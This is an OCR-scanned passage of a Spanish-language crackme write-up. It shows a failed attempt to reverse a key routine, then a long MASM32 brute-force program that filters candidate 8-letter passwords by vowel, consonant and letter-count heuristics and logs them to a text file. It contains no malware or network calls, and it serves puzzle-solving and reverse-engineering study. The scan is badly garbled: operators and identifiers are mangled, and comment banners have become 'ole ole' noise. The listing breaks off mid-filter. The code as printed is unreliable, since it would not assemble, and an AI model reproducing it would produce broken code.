00401357 ¡nz 401345 
00401359 popa 
0040135a retn 


podemos escribir una pequeña rutina que nos calculara el valor de ebx, para los 2 valores estimados de eax. 


xor ebx, ebx 

a0: 

mov eax, xx8/7363 
mov cl, al 

rol ebx, cl 

xor eax, ebx 

mov cl, bh 

ror eax, cl 

cmp eax, af117c39 
je lotengo 

inc ebx 

jmp a0 


esto en teoría debería funcionar, tendríamos los valores iniciales de eax y ebx. pero en la practica no funciono... ni2 se 
supero otra vez. para montar la messagebox utilizo lo siguiente: 


6400 push 00 ¡botón mb_ok 
b858124000 mov eax, 00401258 ;carga en eax la dirección del caption 
50 push eax ;y luego la pushea 


de forma que desmontaba todas nuestras suposiciones. tal vez algún día metamorfe nos diga como adivino estos 
cambios. 


fuerza bruta ¿qué remedio? 


pues si...solo quedaba el recurso de la fuerza bruta, pero con la cantidad de combinaciones existentes y la enormidad 
de los bucles que hay que pasar (mas de medio millón de instrucciones para comprobar cada cadena), había que pensar 
en la forma de acelerar el proceso siguiendo unas pautas lógicas. 

este es el listado asm que desarrollamos crack el destripador y un servidor para la ocasión (ni2, vaya que nos diste 
trabajo). el programa se llamo en un principio destripador, pero después de... 9, 10 versiones (no ma cuerdo), lo 
llamamos marmó6.exe. tiene la particularidad de utilizar un sistema de filtros para evitar que cadenas sin sentido entren 
en los bucles quasi-infinitos de los test. 

las cadenas que cumplen las condiciones son almacenadas en un archivo de texto llamado marmota4.txt, y en ese 
archivo se introduce la cadena desde donde empezara la búsqueda, seguida de un salto de línea y retorno de carro para 


equilibrar los caracteres de control. es posible que algún cracker más avispado sea capaz de dar con la solución de otro 
modo, nosotros no hemos visto otra salida y quizás nadie la haya visto, ya que éste monstruo ha estado sin solución 
hasta la fecha. 


el arma para matar dinosaurios 


486 

.model flat,stdcall 

option casemap:none 

include masm32úincludewindows.inc 
include imasm32úncludeluser32.inc 
include imasm32úncludeMkernel32.inc 
includelib 1masm32Mibluser32.lib 
includelib Ímasm32Miblkernel32.lib 


.data 


buffer db 256 dup (0) 
sacabo db "se ha terminado el tiempo",0 
marmota db "marmota % crack el destripador 2000",0 
archivo db "marmota4.txt",0 
mayusculas db O 

vocales db O 

efes db O 

cues db 0 

ges db 0 

cetas db O 

haches db O 

uves_dobles db O 

jotas db O 

kas db 0 

emes db 0 

enes db 0 

pes db 0 

erres db 0 

eses db O 

tes db O 

uves db 0 

exis db 0 

bes db 0 

ces db O 

des db 0 


consonantes db O 
.data? 


hinstance dd ? 
hfichero dd ? 
fsize dd ? 
memptr dd ? 
bread dd ? 
bwrite dd ? 


.code 

start: 
invoke getmodulehandle,null 
mov hinstance,eax 


call leer 
jmp altajo 
mas]: 


mov esi, offset buffer 
inc esi 

mov ecx, 7 

al: 

inc byte ptr [esi] 

.1£ byte ptr [es1]==05bh 
add byte ptr [esi], 6 
.endif 


cmp byte ptr [esi], 7bh 
jnz sigue 

mov byte ptr [esi], 41h 
inc esi 

loop al 


sigue: 


mov esi, offset buffer 

1£ dword ptr [esi]==0727a7a48h 
1£ dword ptr [esi+4]==0742727a7ah 
jmp fin 

.endif 

.endif 


; este codigo es mucho mas rápido 


;* sustituido filtro: ahora elimina las que tienen menos de 2 mayusculas 


OO OOOO IÓ 
> 


; eliminar: filtro que elimina las cadenas que no contienen 


; 2 mayusculas 
OO OOOO 
> 


; mov esi, offset buffer 
mov mayusculas, 1 ; esto por la h 


; ho es necesario comprobar que sea mayor que 40, todas son mayor que 40 


mov ax, word ptr [esi+1] 
if al < 05bh 

inc mayusculas 

.endif 

if ah < O5bh 

inc mayusculas 

.endif 

mov ax, word ptr [esi+3] 
if al < 05bh 

inc mayusculas 

.endif 

if ah < O5bh 

inc mayusculas 

.endif 

mov ax, word ptr [esi+5] 
if al < 05bh 

inc mayusculas 

.endif 

if ah < O5bh 

inc mayusculas 

.endif 

1f byte ptr [esi+7]< OSbh 
inc mayusculas 


.endif 


.1f mayusculas !=2 
jmp masl 
.endif 


od ole ale ode ole ale ode ole ole ode ole ale ode ole le ode ole ale ode ole le ode ole le ode ole ale ode ole le ole ole ole ode ole ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


; eliminar2: filtro que elimina las cadenas que contienen dos 
; mayusculas 


; consecutivas 
E OOOO OS 
> 


; el segundo caracter ya está sujeto a a,e,1,0,Uu, y 


mov ax, word ptr [esi+2] 
if al < 05bh 

if ah < O05bh 

jmp masl 

.endif 

.endif 


mov ax, word ptr [esi+3] 
if al < 05bh 

if ah < O5bh 

jmp masl 

.endif 

.endif 


mov ax, word ptr [esi+4] 
if al < 05bh 

if ah < 05bh 

jmp masl 

.endif 

.endif 


mov ax, word ptr [esi+5] 
if al < 05bh 

if ah < O5bh 

jmp masl 

.endif 

.endif 


mov ax, word ptr [esi+6] 
if al < 05bh 

if ah < 05bh 

jmp masl 

.endif 

.endif 


OOO OOOO 
> 
k 


> 


;* he comprobado en un diccionario ingles que solo empiezan 
;* las palabras por ha, he, hi, ho, hu y hy. en español 


;* es lo mismo menos la y 
k 


> 


od ole ale ode ole ale ode ole ale ode ole ale ode ole ale ode ole ale ode ole le ole ole le ole ole ale ode ole ale ole ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


¡aoesiesieioe dice jotake que tiene claro que el segundo caracter es minuscula 


mov esi, offset buffer 
mov al, [esi+1] 


ifal lI= " a" 8282 al! Il "e " 8282 al l= " " 8282 al l= "o " 8282 al! hs "u " 8282 al! I- "y" 


jmp masl 
.endif 


OOOO ROI 
E 

k 

> 

;* comprobado que tanto en ingles como en español despues 


;* despues de q siempre va u 
«k 


> 


o ole le ode ole ale ode ole ale ode ole le ode ole ale ode ole ole ode ole le ode ole le ode ole le ode ole le ode ole ole ode ole ole ole ole ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


AIR RR comprobamos la q y q 

1 byte ptr [esi+2]== "q" || byte ptr [esi+2]=="q" 
¡Ae Comprobamos la u y u 

.1f byte ptr [esi+3]!="u" £éz byte ptr [esi+3] !="u" 
jmp masl 

.endif 


alololosiasiololel* ademas, el tercer caracter ha de ser otra vocal 


mov al, byte ptr [esi+4] 


ifal! l=" a" £4 al! l=" a" £z8 al I=" e" K£é al! l=" e" 8£z4 al! l= "3 1" E£é8A 
al != ES 1" £é al != "”" o" £i% al ! l=" o" £24% al != "”" u" S£é al ! l="u "”" 

jmp masl 

.endif 

.endif 

if byte ptr [esi+3]== "q" || byte ptr [esi+3]=="q" 

1f byte ptr [esi+4]i= "u "u" 828 byte ptr [esi+4] !="u" 

jmp masl 

.endif 


asiaiosiosioesio* ademas, el tercer caracter ha de ser otra vocal 


mov al, byte ptr [esi+5] 


ifal! l=" a" £:4 al I=" a" é£z8 al I=" e" Ké al! l=" e" £i4 al! I= "3 1" EBAY 
al l= " " 8282 al! la "o " 8282 al l= "o " 8282 al! l=" u" 828 al! -" y" 

jmp masl 

.endif 

.endif 

1f byte ptr [esi+4]== "q" || byte ptr [esi+4]=="q" 

£ byte ptr [esie5]!="u "u” 8282 byte ptr [esi+5] != "u" 

jmp masl 


asiaiosiodioesio* ademas, el tercer caracter ha de ser otra vocal 
mov al, byte ptr [esi+6] 


ifal!l="a " 8:81 al l= " a" 8282 al != " e" 8281 al l= " e" 8281 al l= "a" LB LA 
al I= " " 8282 al! l= "o " 8282 al l= "o " 8282 al ! t=" u" 828 al ! Il" u" 


jmp masl 
.endif 


.endif 
.endif 


if byte ptr [esi+5]== "q" || byte ptr [esi+5]=="q" 
if byte ptr [esi+6]!="u" $8 byte ptr [esi+6] !="u" 


jmp masl 
.endif 
aaa ademas, el tercer caracter ha de ser otra vocal 


mov al, byte ptr [esi+7] 


fal l="a" Sub al l= "a" 8 al l="e" Saki al l="e" Kél al l="1" EBA 
al !="1" 88 al l="0" £K8 al l="0" 88 al l="u" Suól al l="u" 


jmp masl 
.endif 
.endif 


O OOOO ROI 
> 
dk 


> 


;* sí tenemos una hache las palabras deben estar compuestas 
3* como minimo de dos vocales y como maximo de cuatro 


3* de otro modo nos saldrían palabras sin sentido 
k 


> 


O OOOO ROI 
> 


¡eses vocales valía 1 cuando estaba el filtro de que la segunda letra debía ser vocal 
;* ahora debe valer O 


mov vocales, O 
mov esi, offset buffer 


mov ax, word ptr [esi] 


no¿"m 


¡fal =="a" | al =="e" || al == "1" | al=="0" || al=="u" || al=="y"A 
[| al=="a" [| al =="e" [| al an e [| al=="0" [| al=="y" [| al=="y" 
inc vocales 


.endif 
¡Sere Festo eliminado porque en ah esta la "h" 


fah == "a" | ah =="e" |] ah == "1" | ah=="0" | al=="u"A 

3 llah=="a" || ah =="e" || ah == "i" | ah=="0" || ah=="u" || ah=="y" || an=="y" 
; inc vocales 

;.endif 


mov ax, word ptr [esi+2] 


¡if al == "a" | al =="e" | al == "1" | al=="0" |] al=="u" 

| al=="a" | al =="e" || al == "1" || al=="0" || al=="u"|| al=="y" || al=="y" 
inc vocales 

.endif 

if ah == "a" | ah =="e" || ah == "i" | ah=="0" | al=="u" A 


[| ah=="a" [| ah =="e" [| ah == "mo" [| ah=="0" [| ah=="u"|| ah=="y" [| ah=="y" 
inc vocales 


.endif 


mov ax, word ptr [esi+4] 


if al == "a" | al =="e" || al == "1" | al=="0" | al=="u5n 

| al=="a" | al =="e" || al == "1" || al=="0" || al=="u"|| al=="y" || al=="y" 
inc vocales 

.endif 

if ah == "a" | ah =="e" || ah == "i" | ah=="0" | al=="u" 


[| ah=="a" [| ah =="e" [| ah == "mo" [| ah=="0" [| ah=="u"|| ah=="y" [| ah=="y" 
inc vocales 
.endif 


mov ax, word ptr [esi+6] 


¡if al == "a" | al =="e" || al == "1" | al=="0" | al=="u5n 

| al=="a" | al =="e" | al == "1" || al=="0" || al=="u"|| al=="y" || al=="y" 
inc vocales 

.endif 

if ah == "a" | ah =="e" | ah == "i" | ah=="0" | al=="u" 


[| ah=="a" [| ah =="e" [| ah E mn [| ah=="0" [| ah=="u"|| ah=="y" [| ah=="y" 
inc vocales 
.endif 


if vocales < 2 || vocales > 4 
jmp masl 


.endif 


od ole ale ode ole ale ode ole ale ode ole ale ode ole ale ole ole ale ode ole le ode ole ale ode ole ale ode ole le ode ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


; tres consonantes seguidas es tonto ¿no? 
OOOO ORIÓN 
> 


; ho es necesario cargar en esi el offset de buffer ya lo hemos cargado 
; mov esi, offset buffer 


¡Reese la primera es una h, no? entonces consonantes ya vale 1 pero no lo necesitamos 
; comenzamos la comparación por esi+1 


mov ax, word ptr [esi+1] 
este sí comparamos vocales solo comparamos 10 veces 


.Ifah!="a" 828 ah!="e" 828 ah!="1" £8 ah!="0" £8 ah!="u" $28 ah!="a" 
Si ah!="e" $28 ah!="1" 828: ah!="0" £8 ah!="u" 
If all="a" 828 all="e" 8uól all="1" 828% all="0" £K8 all="u" $28 all= "a" 
Si8 all="e" 88 all= "1" 8uél all="0" £é all="u" 


; si llegamos aquí es que hay tres consonantes seguidas 
; la h primera lo que contiene ah y lo que contiene al 


jmp masl 


.endif 
.endif 


mov ax, word ptr [esi+1] 


; estamos en el segunod caracter y vamos a ver 2? 3* y 4? si son consonantes 


.Ifah!="a" 881 ah!="e" 828 ah!="1" £8 ah!="0" £8 ah!="u" $28 ah!="a" 
Si ah!= "e" $28 ah!="1" 828 ah!= "0" 88 ah!= "u" 


If all="a" 828 all="e" 86 all="1" 828% all="0" £ 8 all="u" $28 all= "a" 
Suél all="e" 8£8 e "" £8 dE "o" 8z8l all="u" 


; si llegamos aqui esque esi+1 y esi+2 son consonantes 
mov al, byte ptr [esi+3] 


If all="a" 828 all= "e" 88 all="1" 828% all="0" £8 all="u" $28 all= "a" 
Si8 all="e" 88 all= "1" 828 all= "0" £Ké all="u" 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+2] 
; estamos en el tercer caracter y vamos a ver 3? 4? y 5” si son consonantes 


Af ah!= "a " 8282 ah!= "e " 8282 ah!= " " 8282 ah!= "o " 8282 ah!= " u" 828 ah!= " any 
88 ah!= "e " 8282 ah!= " " 8282 ah!= "o " 8282 ah!= "ua " 


Af al!= "”" a" Sé al!= "e "”" Sé al!= “3 "”" Sé al!= "o "”" Sé al!= "u "”" Sé al!= "”" ari 
826 all= "e" £8z all="i" $c8r all="0" $eéz all= "u" 


; sI llegamos aqui esque esi4+2 y esi43 son consonantes 
mov al, byte ptr [esi+4] 


If all="a" 828 all= "e" 8uól all="1" 828% all="0" £K8 all="u" $28 all= "a" 
Si all="e" 88 all= "1" 8uél all= "0" £é all="u" 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+3] 
; estamos en el cuarto caracter y vamos a ver 4? 5* y 6? si son consonantes 


.Ifah!="a" 88 ah!="e" 828: ah!="1" £8 ah!="0" £8 ah!="u" $28 ah!="a" 
SuÉl e "e" Sib pe "" £8 dile "o" 8282 ale ty" 


If all="a" 828 all="e" 88 all="1" 828% all="0" £8 all="u" $28 all= "a" 
Si all="e" 86 all= "1" 828% all="0" £8 all="u" 


mov al, byte ptr [esi+5] 


If all="a" 828 all="e" Sul all="1" 828% all="0" £é all="u" $28 all= "a" 
Si all="e" 86 all= "1" Sul all= "0" £é all="u" 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+4] 
; estamos en el quinto caracter y vamos a ver 5* 6? y 7? si son consonantes 


.Ifah!="a" 8281 ah!="e" 8:86 ah!="1" £8 ah!="0" £8 ah!="u" $28 ah!="a" 


Si ah!= "e" $28 ah!="1" 828: ah!= "0" 86 ah!= "u" 


If all="a" 828 all= "e" 8u8l all="1" 828% all="0" 8 all="u" $28 all= "a" A 
Su8l all= "e" 882 ali= "" £8 alo" 'o" 8u8l all="u" 


mov al, byte ptr [esi+6] 


If all="a" 828 all= "e" 8uél all="1" 828% all="0" £K8 all="u" $28 all="a'A 
Si all="e" 86 all= "1" 8uél all="0" £8 all="u" 


jmp masl 
.endif 


.endif 
.endif 


mov ax, word ptr [esi+5] 


; estamos en el sexto caracter y vamos a ver 6? 7* y 8* si son consonantes 


Ifah!="a" £8 ah!="e" £4 ah!="1" 88 ah!="0" £8 ah!="u" 88 ah!="a"A 
Suél e "e" £é8 a "" Siél E "o" 8282 e ty" 


If all="a" 828 all= "e" Só all="1" 828% all="0" £é8 all="u" $28 all= "a" 
Si8 all="e" 86 all= "1" 82% all="0" £ 8 all="u" 
mov al, byte ptr [esi+7] 


If all="a" 828 all="e" 8uól all="1" 828% all="0" £K8 all="u" $28 all= "a" 
Si all="e" 88 all= "1" 8uél all="0" £é all="u" 


jmp masl 
.endif 


.endif 
.endif 


ole e e ole ole ole ole ode ole de A e ol ole ole ole ode ole ol o ole ole ole ole ole ole de le e ole ole ole ole e 
z fin consonantes 


od ole le ode ole ale ode ole ale ode ole ale ode ole ale ode ole ole ole ole le ode ole le ole ole ale ode ole le ole ole ole ole ole ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


; tres vocales seguidas tambien es tonto ¿no? 
od ole le ode ole ale ode ole ale ode ole ale ode ole ale ode ole le ode ole le ode ole le ode ole ale ode ole ale ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ole 
> 


; ya lo tenemos en esi 

; mov esi, offset buffer 

mov ax, word ptr [esi+1] 

; estamos en el segunod caracter y vamos a ver 2? 3” y 4? si son vocales 


Af ah== "a" ll ah== "a" [| ah== "y" [| ah== "o" [| ah== "y" [| ah== " any 
[| ah== "a" [| ah== mo" ll ah== "o" [| ah== "y" 


Af al== "a" [| al== "a" [| al== 1 [| al== "o" [| al== " u" ll al== " a" V 
[| al== "a" [| al== mn [| al== "o" ll al== "y" 


; si llegamos aqui esque esi+1 y esi+2 son vocales 
mov al, byte ptr [esi+3] 


Af al== "a" [| al== "a" [| al== 3" [| al== "o" [| al== "y" ll al== " a" V 
[| al== "a" [| al== 130 [| al== "o" ll al== "y" 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+2] 


; estamos en el tercer caracter y vamos a ver 3* 4? y 5” si son vocales 


Af ah== " a" ll ah== "e " [| ah== 5 " [| ah== "o " [| ah== "u " [| ah== " any 
[| ah== "e " [| a "i " ll raE "o " [| a " u" 
Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" V 
[| al== "e " [| al== " " [| al== "o " ll al== "u " 


; sI llegamos aqui esque esi4+2 y esi43 son vocales 
mov al, byte ptr [esi+4] 


Af al== " a" [| al== "e " [| al== "i " [| al== "o " [ al== " u" ll al== " a" MN 
[| al== "e " [| al== " " [| al== "o " [| al== "a " 


jmp masl 
.endif 


.endif 
.endif 


mov ax, word ptr [esi+3] 


; estamos en el cuarto caracter y vamos a ver 4? 5* y 6? si son vocales 


if ah== " a" ll ah== "e " [| ah== "i " [| ah== "o " [| ah== "u " [| ah== " any 
: [| ah== "e " [| a " " [| eE "o " [| E " y" 


Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" MN 
[| al== "e " [| al== " " [| al== "o " [| al== "ua " 
mov al, byte ptr [esi+5] 


Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" V 
[| al== "e " [| al== " " [| al== "o " [| al== "ua " 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+4] 


; estamos en el quinto caracter y vamos a ver 5* 6? y 7 si son vocales 


Af ah== " a" ll ah== "e " [| ah== "i " [| ah== "o " [| ah== "u " [| ah== " any 
[| ah== "e " [| ah== "i " ll ah== "o " [| ah== " u" 
Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" V 
[| al== "e " [| al== " " [| al== "o " [| al== "ua " 


mov al, byte ptr [esi+6] 


Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" V 
[| al== "e " [| al== " " [| al== "o " [| al== "ua " 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+5] 


; estamos en el sexto caracter y vamos a ver 6? 7” y 8? sí son vocales 


ifa E "a" ll ah== "a" [| ah== a [| ah== "o" [| ah== 
[| ah== "a" [| ah== ma ll ah== "o" [| ah== "y" 
ifa as "a" [| al== "a" [| al== "o [| al== "o" [| al== 
[| al== "a" [| al== qe [| al== "o" ll al== "y" 
mov al, byte ptr [esi+7] 
ifa == "a" [| al== "a" [| al== 1" [| al== "o" [| al== 
[| al== men [| al== mr [| al== "o" ll al== "y" 
jmp masl 
.endif 
.endif 
.endif 


"y" [| ah== Mana 
u" ll al== "a" V 
"y" ll al== "a" V 


ds ole ale ode ole ale ode ole ole ode ole ale ode ole ale ode ole ale ode ole ale ole ole ale ole ole ale ole ole ale ole ole ole ole ole ole ole ole ole ole ole ole ode als ole ole ole ole ole ole ole ole als ole ole als ole ole ale ole ole ale 
> 


; 
; no consentimos 3 b en las combinaciones 


> 


od ole le ode ole ale ode ole ale ole ole ale ole ole ale ode ole ale ode ole le ode ole le ode ole ale ode ole ale ole ole ole ole ole ole ole ole ole ode ole ole ode ole ole ole ole ole ole als ole ole ole ole ole als ole ole als ole ole le 
> 


mov bes, O 


mov ax, word ptr [esi+1] 
if ah=="b" || ah=="b" 
inc bes 

.endif 


Af a =="b" [| al=="b" 
inc bes 
.endif 


mov ax, word ptr [esi+3] 
ifa =="b" [ al =="b" 
inc bes 

.endif 


if a =="b" [| a =="b" 
inc bes 
.endif 


mov ax, word ptr [esi+5] 
ifa =="b" [| ah=="b" 
inc bes 

.endif 


if al=="b" || al=="b" 
inc bes 
.endif 


mov ah, byte ptr [esi+7] 
if ah=="b" |] ah=="b" 
inc bes 

.endif 


.1f bes >2 
jmp masl 
.endif 


ole eel olle ole ole ole ode ee ole ole ole ole ole ole ode ol ode ole ole ole ole ole ole oe ole ode ol e ole ole ole ole ole ole ode ole e ole ole ole ole oe ole ode ole e ole ole ole ole de ole de ole 
> 

; 

; no consentimos 3 c en las combinaciones 

; 


ds ole le ode ole ole ode ole ale ode ole ale ole ole ole ole ole ole ole ole ale ole ole ale ole ole ale ode ole ale ole ole ole ole als ole ode ole ole ole als ole ole ole ole ole als ole ode ole ole ole als ole ole als ole ole als ole ole le 
> 


mov ces, O 


mov ax, word ptr [esi+1] 
if ah=="c" || ah=="c" 
inc ces 

.endif 


no.” 


if al=="c" || al=="c 
inc ces 
.endif 


mov ax, word ptr [esi+3] 
if ah==" " [| ah==" " 
inc ces 

.endif 


no” no.” 


¡if al=="c" || al=="c 
inc ces 
.endif 


mov ax, word ptr [esi+5] 
if ah==" " [| ah==" " 
inc ces 

.endif 


no.” no.” 


if al=="c" || al=="c 
inc ces 
.endif 


mov ah, byte ptr [esi+7] 


ifah=="c" || ah=="c" 
inc ces 
.endif 
.1f ces >2 
jmp masl 
.endif 


ole ee ol ole ole ole ole ole ode e ole ole ole ole ode ole ode ol ode ole ole ole ole ode ole ode ole oe ole e ole ole ole ole e ole ode ole e ole ole ole ole oe ole oe ole e ole ole ole ole de ole od ole 
cd 

; 

; no consentimos 3 d en las combinaciones 


> 


ds ole le ode ole ale ode ole ale ole ole ale ode ole ale ole ole ale ode ole le ode ole le ode ole le ode als ale ole ole ode ole ole ole ode ole ole ole als ole ole als ole ole als ole ole ale ole ole als ole ole als ole ole als ole ole ale 
> 


mov des, O 


mov ax, word ptr [esi+1] 
if ah=="d" || ah=="d" 


inc des 
.endif 


¡if al=="d" || al=="d" 
inc des 
.endif 


mov ax, word ptr [esi+3] 
if ah=="d" || ah=="d" 
inc des 

.endif 


¡if al=="d" || al=="d" 
inc des 
.endif 


mov ax, word ptr [esi+5] 
if ah=="d" || ah=="d" 
inc des 

.endif 


¡if al=="d" || al=="d" 
inc des 
.endif 


mov ah, byte ptr [esi+7] 
if ah=="d" || ah=="d" 
inc des 

.endif 


If des >2 
jmp masl 
.endif 


od ole le ode ole ale ode ole le ode ole ale ode ole ale ode ole ale ole ole ale ode ole ale ode ole ale ole ole ale ole ole ole ole ole ole ole ole ole ole als ole ole ole ole ode als ole ole als ole ole als ole ole ale ole ole als ole ole ale 
> 

> 

; no consentimos 3 g en las combinaciones 

> 


ode ole le ode ole ale ode ole ale ole ole ale ode ole ale ole ole ale ole ole le ode ole ale ole ole ale ode ole ale ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ole als ole ole als ole ole als ole ole als ole ole ale 
> 


mov ges, O 


mov ax, word ptr [esi+1] 
Af ah=="g" [| ah=="g" 
inc ges 

.endif 


Af al=="g" [| al==" " 
inc ges 
.endif 


mov ax, word ptr [esi+3] 
Af ah=="g" [| ah==" " 
inc ges 

.endif 


Af al=="g" [| al=="g" 
inc ges 


.endif 


mov ax, word ptr [esi+5] 


A] 


Af ah=="g 
inc ges 
.endif 


[| ah=="g" 


A] 


Af al=="g 
inc ges 
.endif 


A] 


[| al=="g 


mov ah, byte ptr [esi+7] 
Af ah=="g" [| ah=="g" 
inc ges 


.endif 


.1f ges >2 
jmp masl 
.endif 


lee ole ol ole ole ole ode e ole ole ole ole ole ole ode de le ole ole ole ode ole oe ole ode ol e ole ole ole ole ode ole ode ole e ole ole ole ole oe ole oe ole e ole ole ole ole e ole e ole 
> 

; 

; no consentimos 3 h en las combinaciones 


> 


od ole lod ole ale ode ole ale ode ole ole ode ole ale ode ole ole ode ole ale ode ole le ole ole le ode ole le ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ode ole ole ode ole ole ole ole ole ole ole ole ole als ole ole ale 
> 


; la primera es una hache asi que haches ya vale 1 
mov haches, 1 


mov ax, word ptr [esi+1] 
ifah=="h" || ah=="h" 
inc haches 

.endif 


¡if al=="h" || al=="h" 
inc haches 
.endif 


mov ax, word ptr [esi+3] 
if ah=="h" || ah=="h" 
inc haches 

.endif 


¡if al=="h" || al=="h" 
inc haches 
.endif 


mov ax, word ptr [esi+5] 
ifah=="h" || ah=="h" 
inc haches 

.endif 


¡if al=="h" || al=="h" 
inc haches 
.endif 


mov ah, byte ptr [esi+7] 
ifah=="h" || ah=="h" 
inc haches 

.endif 


.1£ haches>2 
jmp masl 
.endif 


lol ee ol ole ol ole ole ole ode e ole ole ole ole ole ole oe ol de ole ole ole ole ole ole ode ole ode ol e ole ole ole ole oe ole ode ol e ole ole ole ole oe ole ode ole e ole ole ole ole e ole de ole 
> 

; 

; no consentimos 3 z en las combinaciones 

; 


od ole le ode ole ole ode ole ole ode ole ale ode ole ale ode ole ale ole ole ale ole ole ale ode ole ale ole ole ale ode ole ode ole ole ole ole ole ole ode ole ole ole als ole ole ole ole ole ole ole ole ole ole ole als ole ole ale ole ole ale 
> 


mov cetas, O 


mov ax, word ptr [esi+1] 
ifab=="Z" | ah=="z" 
inc cetas 

.endif 


”_o" 


ifal=="Z" || al=="z 
inc cetas 
.endif 


mov ax, word ptr [esi+3] 
ifab=="z" | ah=="z" 
inc cetas 

.endif 


no" 


if al=="Z" || al=="z 
inc cetas 
.endif 


mov ax, word ptr [esi+5] 
Af ah==" " [| ah==" " 
inc cetas 

.endif 


n_n" no" 


ifal=="Z" || al=="z 
inc cetas 
.endif 


mov ah, byte ptr [esi+7] 
Af ah==" " [| ah==" " 
inc cetas 

.endif 


If cetas >2 
jmp masl 
.endif 


ds ole ale ode ole ole ode ole ale ode ole ale ode ole ole ode ole ale ole ole ale ode ole ale ole ole ale ode ole ale ole ole ole ole ole ole ode ole ole ole als ole ole als ole ole als ole ole als ole ole als ole ole als ole ole als ole ole ale 
> 

> 

; ho consentimos 2 j¡ en las combinaciones 

> 


od ole ale ode ole ale ode ole ale ole ole ale ode ole ole ode ole ale ode ole ale ode ole ale ode ole ale ode ole ale ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ode ole ale ole ole als ole ole als ole ole als ole ole ale 
> 


mov jotas, O 


mov ax, word ptr [esi+1] 
Af ah=="j" [| ah=="j" 

inc jotas 

.endif 


Af al=="j" [| al=="j" 
inc jotas 
.endif 


mov ax, word ptr [esi+3] 
Af ah=="j" [| ah=="j" 


inc jotas 
.endif 


mon 


if al=="3" || al=="j 
inc jotas 
.endif 


mov ax, word ptr [esi+5] 
Af ah=="j" [| ah=="j" 

inc jotas 

.endif 


Af al=="j" [| al=="j" 
inc jotas 
.endif 


mov ah, byte ptr [esi+7] 
Af ah=="j" [| ah=="j" 
inc jotas 

.endif 


If jotas >1 
jmp masl 
.endif 


lol ee ol ole ole ole ode ole ode ode ole ode ole ole ode ole ode ol oe ole ole ole ole ode ole ode ole ode ole e ole ole ole ole oe ole ode ole e ole ole ole ole oe ole ode ole e ole ole ole ole de ole ad ole 
> 

; 

; no consentimos 3 k en las combinaciones 

; 


o ole lod ole ale ode ole ale ode ole ale ode ole ale ode ole ale ode ole ale ole ole ale ode ole ale ode ole ale ode ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ole ole ole ole als ole ole ale ole ole ale 
> 


mov kas, O 


mov ax, word ptr [esi+1] 
ifah=="k" || ah=="k" 
inc kas 

.endif 


¡if al=="k" || al=="k" 
inc kas 
.endif 


mov ax, word ptr [esi+3] 
ifah=="k" || ah=="k" 
inc kas 

.endif 


¡if al=="k" || al=="k" 
inc kas 
.endif 


mov ax, word ptr [esi+5] 
if ah=="k" || ah=="k" 
inc kas 

.endif 


¡if al=="k" || al=="k" 
inc kas 
.endif 


mov ah, byte ptr [esi+7] 
if ah=="k" || ah=="k" 
inc kas 


.endif 


If kas >2 
jmp masl 
.endif 


ol lee ol ole ole ole ole ole ode oe ole ole ole ole ole ole ode ol ode ole ole ole ole ole ole ode ole de ol e ole ole ole ole ode ole de ole oe ole ole ole ole oe ole e ole e ole ole ole ole e ole de ole 
El 

; 

; no consentimos 3 m en las combinaciones 


> 


od ole le ode ole ale ode ole ole ode ole ole ode ole ale ode ole ale ode ole ale ode ole le ode ole ale ode ole le ode ole ole ole ole ole ole ole ole ole als ole ode ole ole ode ole ole ode ole ole ole ole ole ole als ole ole als ole ole le 
> 


mov emes, O 


mov ax, word ptr [esi+1] 
Af ah==" " [| ah==" " 


.endif 


if al==" " ll al==" " 
inc emes 
.endif 


mov ax, word ptr [esi+3] 
Af ah==" " [| ah==" " 


.endif 


if al==" " ll al==" " 
inc emes 
.endif 


mov ax, word ptr [esi+5] 
if ah==" " [| ah==" " 
inc emes 

.endif 


ifal=="m" || al=="m" 
inc emes 
.endif 


mov ah, byte ptr [esi+7] 
ifabh=="m" || ah=="m" 
inc emes 

.endif 


If emes >2 
jmp masl 
.endif 


lol e ol ode ol ole ode ole ode ode ole ole ole ole ole ole ole o ode ol ole ole ole ole ole oe ole ode ol e ole ole ole ole oe ole oe ole e ole ole ole ole oe ole e ole e ole ole ole ole de ole od ole 
> 

; 

; no consentimos 3 n en las combinaciones 


> 


od ole le ode ole ale ode ole ale ole ole ale ode ole ale ode ole ale ode ole le ole ole ale ode ole ale ode ole ale ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole le 
> 


mov enes, O 


mov ax, word ptr [esi+1] 
if ah==" " [| ah==" " 
inc enes 

.endif 


if al=="n" || al=="n" 
inc enes 
.endif 


mov ax, word ptr [esi+3] 
ifab=="n" || ah=="n" 
inc enes 

.endif 


if al=="n" || al=="n" 
inc enes 
.endif 


mov ax, word ptr [esi+5] 
ifabh=="n" || ah=="n" 
inc enes 

.endif 


¡if al=="n" || al=="n" 
inc enes 
.endif 


mov ah, byte ptr [esi+7] 
ifabh=="n" || ah=="n" 
inc enes 

.endif 


If enes >2 
jmp masl 
